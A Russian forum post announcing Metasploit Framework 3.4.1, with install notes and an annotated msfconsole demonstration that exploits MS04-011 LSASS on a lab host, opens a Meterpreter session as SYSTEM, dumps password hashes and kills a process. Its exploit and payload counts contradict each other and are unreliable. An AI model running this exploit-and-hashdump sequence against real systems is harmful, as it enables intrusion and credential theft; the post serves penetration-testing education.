PDA

Просмотр полной версии : Metasploit Framework 3.4.1


grivei
10.09.2010, 14:51
ОПИСАНИЕ:
Metasploit Framework 3.4.1 - это платформа для создания программ позволяющих эксплуатировать наиболее распространенные ошибки в локальных и сетевых приложениях. Фреймворк используется профессионалами в области защиты информации. Позволяет исследовать уязвимости, имеет набор стандартных шеллкодов. На данный момент, пакет Metasploit Framework 3.4.1 функционирует как на Linux так и на Windows, а так же на Мас. Пакет имеет 2 интерфейса: консольный и веб. Существует 8,980 эксплойтов включенных в пакет фрейворка, способных решать 1000 разных задач. Программа распространяется свободно по лицензии GNU GPL.


Перевод с официального сайта новости, касающейся выхода пакета Metasploit Framework 3.4.1

Мы счастливы объявить, что 3.4.1 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.3.3 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.

Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)

Этот выпуск может быть скачан с официального web-сайта Metasploit www.metasploit.com

Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org (http://nash-forum.itaec.ru/redirector.php?url=http%3A%2F%2Fwww.ruby-lang.org) и собрать его из исходника.

Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)

Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).

Быстрая демонстрация использования msfconsole с meterpreter:

____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *


= [msf v3.4.1
=[ msf v3.4.1
+ -- --=[ 8,990 exploits - 890 payloads....................[8,990 эксплоитов - 890 начинок (полезных грузов)
+ -- --=[ 678 encoders - 211 nops ........................[678 кодеров - 211 только для указанных целей (неуверен в переводе)
= [456 aux

msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
Started bind handler.. .................................... стартует связанный обработчик
Getting OS information... .................................... Получаем информацию об операционной системе
Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
Upload completed. .................................................. . Загрузка завершена.
Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============

Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]

meterpreter > ps .................................................. ....... смотрим процессы

Process list
============

PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr

meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)